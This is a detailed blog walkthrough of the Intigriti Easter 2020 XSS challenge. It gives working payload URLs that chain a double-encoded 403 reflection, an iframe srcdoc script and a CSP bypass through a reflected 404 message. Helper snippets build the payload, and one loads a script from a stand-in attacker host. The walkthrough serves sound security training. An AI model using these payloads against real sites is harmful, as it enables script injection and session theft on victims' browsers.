Intigriti XSS Easter Challenge 2020: Pwning the DOM with 404’s

On the 13th of April 2020, Intigriti released their XSS challenge for Easter. When I saw the tweet, I knew I had to give it a go. I already had some experience with their previous challenges, but I never managed to put in the extra effort to complete one. This time, I was dedicated.

You should know that I am by no means an XSS guru. When I’m testing for XSS, I mostly stick to simple payloads. I put a lot of effort into this challenge and learned so much along the way. It also gave me ideas for new XSS payloads for my future bug bounty ventures. I have absolutely no regrets that I’ve spent multiple hours on this challenge!

This blog post will serve as an in-depth technical walkthrough on how to solve this challenge. I did my best to explain as much as possible of the technical details as well as my thought process, in a (hopefully) correct way. I hope that you can gain more knowledge from this blog post and that it may help you in your future bug bounty endeavors. I hope you have a good read!

The challenge

The goal was (obviously) to find the DOM-based XSS in the web application, and exploit it with an alert(document.domain) payload. The challenge could be found at https://challenge.intigriti.io and the rules were very clear:

  • XSS should work on the latest version of Firefox and Chrome
  • Should bypass Content-Security Policy (CSP)
  • Should execute alert(document.domain)
  • Should execute on the same page, on the same domain
  • No self-XSS or Man-in-the-Middle (MitM)

The web page had the following layout. Take note of the drop-down list.

If we take a look at the source, we could see the following relevant HTML code. Notice how we have various options for the drop-down list that are shown.

<!DOCTYPE html>
<html>
<head>
  <title>Easter XSS Challenge - Intigriti</title>
</head>
<body>
[...]
  <div id="reason-container">
    <select id="reasons">
      <option value="">-- select a reason --</option>
      <option value="1">Get rewarded on your terms</option>
      <option value="2">Match your skills</option>
      <option value="3">Connect with your peers</option>
      <option value="4">Do what you love</option>
      <option value="5">Seamless payments</option>
      <option value="6">Easy communication</option>
    </select>
    <div id="reason">
    </div>
  </div>
  <script src="script.js"></script>
</body>
</html>

And finally, we have our script.js file, that handles displaying the correct text for each of our various reasons.

var hash = document.location.hash.substr(1);
if(hash){
  displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
  if(e.target.value != "")
    displayReason(e.target.value);
}
function reasonLoaded () {
    var reason = document.getElementById("reason");
    reason.innerHTML = unescape(this.responseText);
}
function displayReason(reason){
  window.location.hash = reason;
  var xhr = new XMLHttpRequest();
  xhr.addEventListener("load", reasonLoaded);
  xhr.open("GET",`./reasons/${reason}.txt`);
  xhr.send();
}

Notice when we select an option from the drop-down list that our fragment in our URL changes to a number. This is because the JavaScript code is grabbing the contents for the selected reason from a text file, and the filename is the value of our selected option, ending with .txt. That number will be reflected back in our URL. Let’s take a deeper look into the code to see what it does in more detail.

Breaking down the JS code

First of all, we can see that a variable called hash is set, which contains the part of the URL that comes after the # character (the fragment). This will be the number of the selected option.

var hash = document.location.hash.substr(1);

Next, a check happens if the hash variable already contains a value. If so, the code will jump to the displayReason() function. Then, we can see an onchange event handler for the element with an id attribute of “reasons”. So when another option is picked from the drop-down list and that value is not empty, the code will also jump to the displayReason() function, with the value of the selected option.

if(hash){
  displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
  if(e.target.value != "")
    displayReason(e.target.value);
}

Skipping to the last function, displayReason() handles loading the correct reason. It has a parameter called reason, which will contain our value from the hash variable or from the selected option. The function first writes the reason value back into the fragment of the URL. Next, it creates an XMLHttpRequest object and adds an event listener to it. This listener fires on the load event, meaning that when the XHR request has finished, the function reasonLoaded() is called. Finally, the XHR object sends a GET request to ./reasons/${reason}.txt, where ${reason} is a template literal placeholder that is replaced with the value of the reason parameter.

function displayReason(reason){
  window.location.hash = reason;
  var xhr = new XMLHttpRequest();
  xhr.addEventListener("load", reasonLoaded);
  xhr.open("GET",`./reasons/${reason}.txt`);
  xhr.send();
}
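To make this data flow concrete, here is a minimal sketch that can be run in Node.js. It mirrors how the fragment ends up in the request URL. Note that requestUrlFor() is a hypothetical helper that I made up for illustration, it is not part of script.js.

```javascript
// Hypothetical helper (not part of script.js): mirrors how displayReason()
// builds the XHR URL from the fragment of the page URL.
function requestUrlFor(pageUrl) {
  const page = new URL(pageUrl);
  // Same idea as document.location.hash.substr(1): drop the leading "#".
  const reason = page.hash.slice(1);
  // Same template literal as in displayReason().
  const relative = `./reasons/${reason}.txt`;
  // The browser resolves the relative path against the URL of the page.
  return new URL(relative, page).href;
}

console.log(requestUrlFor("https://challenge.intigriti.io/#1"));
// https://challenge.intigriti.io/reasons/1.txt
console.log(requestUrlFor("https://challenge.intigriti.io/#test"));
// https://challenge.intigriti.io/reasons/test.txt
```

Whatever we place after the # ends up in the path of a request to the same origin, which is exactly the part that we control.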

There are other XHR events as well. Looking at the MDN documentation on XMLHttpRequest, we can see the following events:

  • load – The HTTP request is completed and all data is in the response
  • progress – The amount of data that has been retrieved has changed
  • error – An error occurred during the transfer
  • abort – The user has canceled the transfer

Now, looking back at reasonLoaded(), this function is responsible for loading the unescaped response text into the HTML element with the id of “reason”. When we look at our HTML source code, we can see that this is a simple, empty <div>. Notice that the unescape() function is called on this.responseText, where this refers to the xhr object that was created in the displayReason() function. Also note that this value is inserted with the .innerHTML property, meaning that any markup in the response is parsed as HTML rather than shown as text. This will play a key role for our injection later on.

function reasonLoaded () {
    var reason = document.getElementById("reason");
    reason.innerHTML = unescape(this.responseText);
}

If we look up the unescape() function, it tells us the following:

The unescape() function computes a new string in which hexadecimal escape sequences are replaced with the character that it represents.

So what it does in simple terms: it decodes percent-encoded sequences such as %3C in the string that is passed to it, much like URL-decoding. Now that we have an understanding of what the JavaScript code is doing, we can start looking for vulnerabilities.
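A quick way to get a feeling for unescape() is to run it in Node.js or in the browser console. The sketch below only uses built-in functions. The input strings are my own examples.

```javascript
// unescape() is a legacy global, still available in browsers and Node.js.
const encoded = "%3Ch1%3Epwnd";

console.log(unescape(encoded));           // <h1>pwnd
console.log(decodeURIComponent(encoded)); // <h1>pwnd

// Only one layer is decoded per call: %25 becomes %, nothing more.
console.log(unescape("%253Ch1%253E"));    // %3Ch1%3E

// A lone % is left untouched, where decodeURIComponent() would throw.
console.log(unescape("100%"));            // 100%
```

The fact that a single call only removes one layer of encoding is worth remembering for later.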

Gaining HTML injection

If we tried to enter a value in the fragment of the URL that was not a number, we observed the following behavior.

https://challenge.intigriti.io/#test

A 404 error message appears before us. Remember that a call is happening to an endpoint in the background that tries to grab the correct text file for our selected reason. The JS code is now trying to call ./reasons/test.txt, which does not exist. Interestingly, we actually receive an HTTP status code of 200 when we call this endpoint, as can be seen in our developer console. It’s not really a 404. 🙂

The interesting part is that our entered value is reflected back in the error message. Take note of this behavior.

The obvious thing to do next is to see if we can enter HTML tags in the fragment of the URL, and see if they would render in the browser.

https://challenge.intigriti.io/#%3Ch1%3Epwnd

Sadly for us, we didn’t pwn the app, as our angle brackets got URL-encoded and percentages were replaced with underscores (_). This can also be seen in the DOM with the inspector tool.

The question now arises: how do we bypass this encoding issue? It’s only a matter of logical thinking in this case. We know for a fact that when we enter a filename that does not exist on the web server, we will receive a “404” error. But, what about other errors? Do they apply the same encoding protections as the 404 error?

Think about it, there are various other error messages that can be thrown by a web server. For example:

  • 400 – Bad Request
  • 401 – Unauthorized
  • 403 – Forbidden
  • 404 – Not Found
  • 500 – Internal Server Error
  • etc.

Let’s see how we can trigger one of these errors, if possible. A 400 Bad Request is simply thrown when we provide a single percent (%) character in the path of the URL, like this.

https://challenge.intigriti.io/%

This is actually a legitimate 400 error message thrown by the Apache service. The problem is that this error message does not reflect back our inserted string. Which is normal, since Apache was not able to correctly handle the request, and therefore throws a general error message at you.

Forcing a 401 is somewhat unlikely in this case, as there is no portion of the web app that requires authentication. I also wasn’t able to generate a 500 error. We have already proven our 404 error message, so that leaves us with one more viable option: the 403 forbidden.

There are certain files that, when we try to request them from a web server, almost always trigger a 403. This happens a lot with hidden files. A hidden file starts with a dot (.) and is supposed to stay hidden because it commonly contains sensitive information. A good example is the .htaccess file. Let’s see what happens when we attempt to request this file.

https://challenge.intigriti.io/.htaccess

We now have found another error message that reflects our requested filename back in the browser. Let’s see how this behaves when we request this on the challenge page.

https://challenge.intigriti.io/#/.htaccess%3ch1%3epwnd

This time, there seems to be no encoding applied. However, our angle brackets were not rendered as HTML tags inside the browser. Let’s take a look at the DOM to analyze this behavior.

We can see that the error message itself is enclosed in <p> tags, but our <h1> tag did not render. This might happen because the web application URL-decodes the requested path and then renders the decoded characters safely, as text. It might not look like it in the address bar, but we are actually sending the URL-encoded values of our angle brackets, which are %3C (<) and %3E (>). The browser simply displays them decoded for us, but looks can be deceiving after all.

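If the web application does not recursively check for URL-encoded values in the URL, we might be able to apply a double URL-encoding scheme. Let’s try entering %253C and %253E, in which the percent character itself is replaced by its URL-encoded value, %25. If only one layer is decoded on the way to the error page, the response would contain the literal text %3C and %3E, which the unescape() call in reasonLoaded() then turns into real angle brackets. Let’s see what happens when we enter the following string.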

https://challenge.intigriti.io/#/.htaccess%253ch1%253epwnd

Lo and behold, the <h1> rendered successfully in our browser and we have a successful HTML injection. Pack up your things, we’re ready here. Let’s inject an XSS payload and call it a day! That was my initial thought, little did I know what was awaiting me…

Inspecting the DOM shows us indeed that our <h1> tags were rendered by the browser. We are not even required to enter closing tags. This is the behavior of the HTML parser behind the .innerHTML property, which automatically closes tags that are left open.
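Why does the double encoding get through? The sketch below models the two decoding passes. Keep in mind that serverErrorBody() is purely my assumption of how the server behaves (decode the path once, HTML-escape it, reflect it), based on what we observed. The wording of the error message is made up as well.

```javascript
// ASSUMPTION: simplified model of the server's 403 page. It decodes the
// requested path once and HTML-escapes it before reflecting it.
function serverErrorBody(rawPath) {
  const decoded = decodeURIComponent(rawPath);
  const escaped = decoded
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
  // Made-up wording, only the reflection of the path matters here.
  return `<p>Access to ${escaped} is forbidden.</p>`;
}

// What reasonLoaded() would assign to .innerHTML.
function clientMarkup(rawPath) {
  return unescape(serverErrorBody(rawPath));
}

const single = clientMarkup("/reasons//.htaccess%3ch1%3epwnd.txt");
const double = clientMarkup("/reasons//.htaccess%253ch1%253epwnd.txt");

console.log(single); // contains &lt;h1&gt;, shown as plain text
console.log(double); // contains <h1>, parsed as a real tag
```

In this model, the single-encoded brackets are decoded by the server and neutralized right away. The double-encoded ones reach the response as the harmless text %3c and %3e, and only become angle brackets when unescape() runs in the browser.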

So, let’s attempt to inject <script> tags, trigger an alert() message box and call it a day. In this case, we need to provide closing tags ourselves since the .innerHTML property does not take care of script tags.

https://challenge.intigriti.io/#.htaccess%253cscript%253ealert(1);%253c/script%253e

What? No alert message? Why? Let’s inspect the DOM and see what has happened.

We can see a correct injection of our <script> tag, but it didn’t trigger the alert() payload. Okay, this is fine. Let’s attempt to trigger an XSS by using an event handler, like <img src=x onerror=alert(1)>, that should do it.

https://challenge.intigriti.io/#.htaccess%253cimg%20src=x%20onerror=alert(1)%20/%253e

Again, no alert. Inspecting the DOM shows us again that the <img> tag was successfully injected, and should trigger our payload.

However, we can actually confirm that it should work. If we check the Console tab in our developer console, we can see something peculiar.

It seems that there is a Content Security Policy blocking our JavaScript. The error message shows us that it was blocked by the default-src directive. Let’s see exactly how this CSP is configured.

Looking at the response headers of our request, we can see that the default-src 'self' policy is in place, which is quite strict. This basically means that we can only load JavaScript from the same origin, and that inline JavaScript is prohibited. We will go deeper into CSP later on.

It seems that we currently have some roadblocks ahead of us, as we are not simply able to trigger our JS payload.

Overcoming obstacles

We currently know that we are able to inject HTML code inside the web page, but we stumbled on two problems:

  • We need to find a way to successfully execute JavaScript, through our HTML injection.
  • We need to bypass the strict CSP policy that is in place.

Because of the CSP that is in place, we know that we can’t make use of the following options:

  • External JS scripts
  • Inline JavaScript
    • Event handler attributes (e.g. onerror)
    • javascript: protocol

With this information in the back of our minds, let’s start researching our options.

JS Execution

We already tried to inject <script> tags earlier, but this didn’t work. I didn’t explain to you yet why this doesn’t work. This tag is still a viable option, since it has a src attribute, which might allow us to somehow load JavaScript that comes from the same origin. But I’m getting ahead of myself now.

When the web page is loaded by the browser, the DOM is built and every <script> tag that the parser encounters is executed, provided that the CSP allows it, which in this case means that it must come from the same origin. The <script src="script.js"></script> code, inside the HTML source code, fulfills this requirement and is therefore loaded by the browser. It will grab the file, parse the JavaScript inside and execute it.

When we do our HTML injection through the fragment in the URL, the script.js file is making use of the .innerHTML property to insert our code into the DOM. However, browsers do not execute <script> elements that are inserted through .innerHTML after the page has been parsed. The injected tag shows up in the DOM, but it is never loaded or run, even if its source comes from the same origin.

You can simply test this yourself with the following HTML code:

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<h2>Result:</h2>
	<div id="reason"></div>
	<script>
		var hash = document.location.hash.substr(1);
		var reason = document.getElementById("reason");
		reason.innerHTML = unescape(hash);
	</script>
</body>
</html>

Let’s attempt to inject an external JS file that pops an alert message. I have an xss.js file already hosted on my domain, that pops an alert(document.domain).

Even though there is no CSP applied on the local file, we can clearly see that our JavaScript does not execute. The <script> tags are added after the DOM has been built, and are therefore not loaded by the browser. If you analyze the Network tab in the developer console, you will also see that the browser does not retrieve the external JS file.

If we cannot load JavaScript with the <script> tags in the current page, what other options do we have? Which HTML tags can still be used to successfully execute JavaScript?

After some research, I learned that the <iframe> tag has a srcdoc attribute, which can be used in this situation. An iframe will work here because it acts as a nested browser window with its own document, meaning that a new DOM will be built for the code that’s inside the iframe, even after we inject it through .innerHTML. The srcdoc attribute allows us to inject our own HTML code inside the iframe, rather than referring to another web page with the src attribute. This provides us the option to work with <script> tags again if we use them in combination with the srcdoc attribute.

Going back to our previous example, let’s now attempt to inject our <script> tags inside an <iframe> by using the srcdoc attribute, and see what happens.

This time, our JavaScript code did execute. There is no output in our alert box because we tried to execute document.domain, and we are working with a local file here. If we now inspect the DOM, we can see the following.

The <iframe> tag is rendered by the .innerHTML property. Then, the iframe injects the <script> tag that is stored inside the srcdoc attribute and is placed inside the <head> tag of the iframe. Finally, the DOM is built for the iframe and the JavaScript code inside our injected JS file gets executed.

We now have found a viable option to reliably inject JavaScript code with <script> tags with the help of an <iframe>. Now, let’s see how we can deal with the CSP protection.
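For anyone who wants to repeat both experiments on the local test page, the sketch below builds the two fragments. The script URL is a placeholder that I made up, so replace it with a file that you control. toFragment() is also just a helper for this example.

```javascript
// Hypothetical script location, replace it with a file you control.
const scriptUrl = "https://attacker.example/xss.js";

// Plain <script> tag: inserted by .innerHTML, but never executed.
const plainScript = `<script src="${scriptUrl}"></script>`;

// The same tag wrapped in the srcdoc of an iframe: the iframe parses its
// own document, so the script is fetched and executed.
const viaSrcdoc = `<iframe srcdoc='${plainScript}'></iframe>`;

// Build a fragment for the local test page, which calls unescape() on it.
function toFragment(markup) {
  return "#" + encodeURIComponent(markup);
}

console.log(toFragment(plainScript));
console.log(toFragment(viaSrcdoc));
```

Append either output to the URL of the local test file. Only the second one should result in a request for the JS file in the Network tab.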

CSP Bypass

Let’s take a step back first and explain what the Content-Security Policy response header actually is.

The HTTP Content-Security-Policy response header allows web site administrators to control resources the user agent is allowed to load for a given page. With a few exceptions, policies mostly involve specifying server origins and script endpoints. This helps guard against cross-site scripting attacks (XSS).

In simple terms: it is being used to block certain resources from loading and is mostly used to prevent XSS attacks. The CSP header is being used to tell the browser what content it is allowed to load and what not.

There are many fetch directives that can be used in the CSP header. Some examples are:

  • img-src – specifies valid sources of images and favicons
  • script-src – specifies valid sources for JavaScript
  • style-src – specifies valid sources for stylesheets
  • etc.

There are many more directives available. Documentation is available on MDN.

As we’ve already seen, we’re working with a default-src 'self' policy. The default-src directive acts as a fallback for all other undefined directives. In this case, it is applied for each fetch directive.

The self value represents the source for the directive, it tells us what sources we are able to load. Looking at the MDN documentation for self, it shows us the following definition:

‘self’: Refers to the origin from which the protected document is being served, including the same URL scheme and port number.

There are other sources as well, but I suggest that you take a look at the documentation and read them for yourself.
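To illustrate the fallback to default-src and the meaning of 'self', here is a heavily simplified model in JavaScript. It is only a sketch: it handles nothing but the 'self' source, while real browsers also deal with nonces, hashes, schemes, wildcards and more. Both function names are my own, and the external URL is a made-up example.

```javascript
// Simplified model of a CSP header: directive name -> list of sources.
function parsePolicy(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Returns true if an external script at scriptUrl may load on pageUrl.
// Only the 'self' source is modelled here.
function scriptAllowed(header, pageUrl, scriptUrl) {
  const policy = parsePolicy(header);
  // script-src falls back to default-src when it is not defined.
  const sources = policy.get("script-src") ?? policy.get("default-src");
  if (sources === undefined) return true; // no directive applies
  const page = new URL(pageUrl);
  const script = new URL(scriptUrl, page);
  // 'self' means: same scheme, host and port as the protected page.
  return sources.includes("'self'") && script.origin === page.origin;
}

const csp = "default-src 'self'";
const page = "https://challenge.intigriti.io/";
console.log(scriptAllowed(csp, page, "script.js"));                       // true
console.log(scriptAllowed(csp, page, "https://attacker.example/xss.js")); // false
```

Inline scripts and event handler attributes have no URL at all, so 'self' can never match them. They are blocked regardless of where the page is hosted.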

Now that we understand what the scope is of our CSP policy, we need to find a way to load JavaScript from the same origin, and trigger an alert(document.domain). However, we can see that only the script.js file is available on this domain, and this file does not contain the JS code that we require. So, what are our options? How can we load valid JavaScript that originates from the same origin?

Remember the 404 error that reflected our requested filename?

https://challenge.intigriti.io/idontexist

This error message does not contain any markup language, it is simply plain text that is being displayed.

view-source:https://challenge.intigriti.io/idontexist

What if we can inject a string that, when carefully crafted, allows us to convert this string into valid JavaScript code and then load it in as a source for our <script> tag? It would then originate from the same origin, allowing us to bypass the CSP protection.

Let’s go back to our local PoC file and use this string as JavaScript code.

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<script>404 - 'File "idontexist" was not found in this folder.'</script>
</body>
</html>

This JS code will obviously not work for our purpose. However, it can still be interpreted as valid JavaScript. If you observe closely, a subtraction is happening between an integer and a string, which will result in NaN.

However, what if we have the following text as our JavaScript code?

404 - 'File "';alert(1);'" was not found in this folder.'

When we close both strings with single quotes (') and use two semicolons (;) to separate our JS code from them, we can successfully gain JavaScript execution. We can see that the DOM now looks like the following in our PoC.
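The same check can be reproduced outside of the browser. The sketch below rebuilds the error text from the PoC above and runs it as a script body in Node.js, with a stub in place of alert(). The helper names notFoundBody() and runAsScript() are my own.

```javascript
// Error text as used in the PoC above, with the requested name reflected.
function notFoundBody(requestedName) {
  return `404 - 'File "${requestedName}" was not found in this folder.'`;
}

// Run the text as JavaScript and record every call to alert().
function runAsScript(body) {
  const calls = [];
  const alertStub = (value) => calls.push(value);
  new Function("alert", body)(alertStub);
  return calls;
}

console.log(runAsScript(notFoundBody("idontexist")));   // []
console.log(runAsScript(notFoundBody("';alert(1);'"))); // [ 1 ]
```

The first text is a valid but useless subtraction. The second one is split into three statements, and the middle one is our alert(1).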

This confirms that we can achieve our DOM XSS by using ';alert(1);' as our source file for our <script> tag. This can be confirmed by requesting said string as a file, and checking whether the web application spits out the exact string that we have used in our PoC.

https://challenge.intigriti.io/';alert(1);'

Good. This confirms that we can use this string as our payload. Now, let’s see what happens when we try to request this on the challenge page itself.

https://challenge.intigriti.io/#.htaccess%253ciframe%20srcdoc='%3Cscript%20src=/'alert(1);'%3E%3C/script%3E'%253e%253c/iframe%253e

Strange. It seems like we have entered a correct payload, but there is no alert message. Why? Again, let’s investigate the DOM to see where things went wrong.

It turns out that our payload got all mangled up. This is behavior of the .innerHTML property that attempts to place strings inside attributes. As you can see, we have some spacing issues that need to be resolved before the payload will work.

Spacing

The goal is to actually create a srcdoc payload that does not contain any spaces, and that stays in place after .innerHTML has parsed the fragment of the URL. Notice how we have a space at <script src="...", this actually breaks our payload as it needs to stay a part of the srcdoc attribute. But because of the space, .innerHTML thinks that the string after the space is the start of a new attribute.

To fix this, we can easily replace the space with a /. This would give us the following string: <script/src="...". Notice that we also can leave out the quotes for the src attribute, which makes things also easier. With this method, no spaces exist in our payload.
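The effect of that single space can be shown with a tiny stand-in for the HTML tokenizer. This is only a sketch: unquotedValue() is a hypothetical helper, /x is a placeholder path, and I wrote the inner angle brackets as entities so that the space is the only difference between the two inputs.

```javascript
// Simplified stand-in for the HTML tokenizer: an unquoted attribute value
// ends at the first whitespace character or ">".
function unquotedValue(markup, attribute) {
  const match = markup.match(new RegExp(`${attribute}=([^\\s>]*)`));
  return match ? match[1] : null;
}

const withSpace = "<iframe srcdoc=&lt;script src=/x&gt;&lt;/script&gt;>";
const withSlash = "<iframe srcdoc=&lt;script/src=/x&gt;&lt;/script&gt;>";

console.log(unquotedValue(withSpace, "srcdoc"));
// &lt;script
console.log(unquotedValue(withSlash, "srcdoc"));
// &lt;script/src=/x&gt;&lt;/script&gt;
```

With the space, only the first part of our payload ends up in srcdoc and the rest is treated as a separate attribute. With the slash, the whole string stays together.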

Triggering the XSS

After fixing the spacing issue, we have come up with the following payload string.

https://challenge.intigriti.io/#/.ht%253ciframe%20srcdoc=%3Cscript/src=/';alert(document.domain);'%3E%3C/script%3E%20%253e%253c/iframe%253e

We create an <iframe> with a srcdoc attribute containing our <script> payload that fulfills the CSP requirements and does not contain any spaces. The iframe loads in our code, the DOM is built for the iframe window and the <script> tag gets executed.

And now, our XSS finally gets executed correctly.

If we have a final look at the DOM, we can indeed see that our payload got parsed correctly by the .innerHTML property, and that our <script> tag is correctly inserted inside the <head> tag of the iframe.
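To recap how the final payload is put together, the sketch below assembles it from its parts: the outer <iframe> brackets are encoded twice, the inner <script> brackets once, and the space inside the script tag is replaced with a slash. The helper names are my own, the output matches the URL shown above.

```javascript
// Percent-encode only the angle brackets, once: "<" becomes "%3C".
const encodeOnce = (s) =>
  s.replace(/[<>]/g, (c) => "%" + c.charCodeAt(0).toString(16).toUpperCase());

// Percent-encode only the angle brackets, twice: "<" becomes "%253c".
const encodeTwice = (s) =>
  s.replace(/[<>]/g, (c) => "%25" + c.charCodeAt(0).toString(16));

function buildFragment(js) {
  // "/" instead of a space, and the 404 trick as the script source.
  const inner = `<script/src=/';${js};'></script>`;
  return (
    "/.ht" +                                        // triggers the 403 page
    encodeTwice("<") + "iframe%20srcdoc=" +
    encodeOnce(inner) +
    "%20" + encodeTwice("></iframe>")
  );
}

const url =
  "https://challenge.intigriti.io/#" + buildFragment("alert(document.domain)");
console.log(url);
```

Swapping out the argument of buildFragment() is all it takes to run other JavaScript, as long as it does not contain characters that break the surrounding quotes.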

Conclusion

In this challenge, we were able to bypass the URL-encoding protection and gain HTML injection by leveraging a 403 Forbidden instead of a 404 Not Found.

Next, we discovered that <script> tags are not loaded when injected through .innerHTML, as the DOM is already built by then. But they can still be executed when leveraged in combination with the srcdoc attribute of an <iframe>.

Afterwards, we found a bypass for the CSP protection by leveraging a content injection vulnerability in the 404 error. We reflected valid JavaScript back inside the error message, which could be used as the source for the <script> tag because the error message is served from the same origin.

Finally, we fixed the spacing issue within our srcdoc attribute, so that .innerHTML handled the complete string inside this attribute as its value, allowing us to execute our XSS payload successfully.

Final words

During this challenge, I did a tremendous amount of research and learned so much along the way. It gave me new insights on how to tackle potential XSS vulnerabilities in the future. When you read this blog post, do not think that it was an easy task for me to discover this. Hours of research went into this challenge and there were a lot of frustrations along the way, where I didn’t see the solution and I almost decided to give up on this challenge.

During penetration tests or bug bounty hunting, you will most likely also come across frustrations if you cannot exploit a potential vulnerability. It’s all about being determined and thinking positively: “You CAN exploit this”. Put in the extra effort and don’t give up, in any situation. And I promise you, the satisfaction is so worth it afterwards if you see that alert on your screen, pop that shell, etc.

I hope that you’ve enjoyed this (rather long) read, and that you’ve learned something extra from it.

Happy hacking!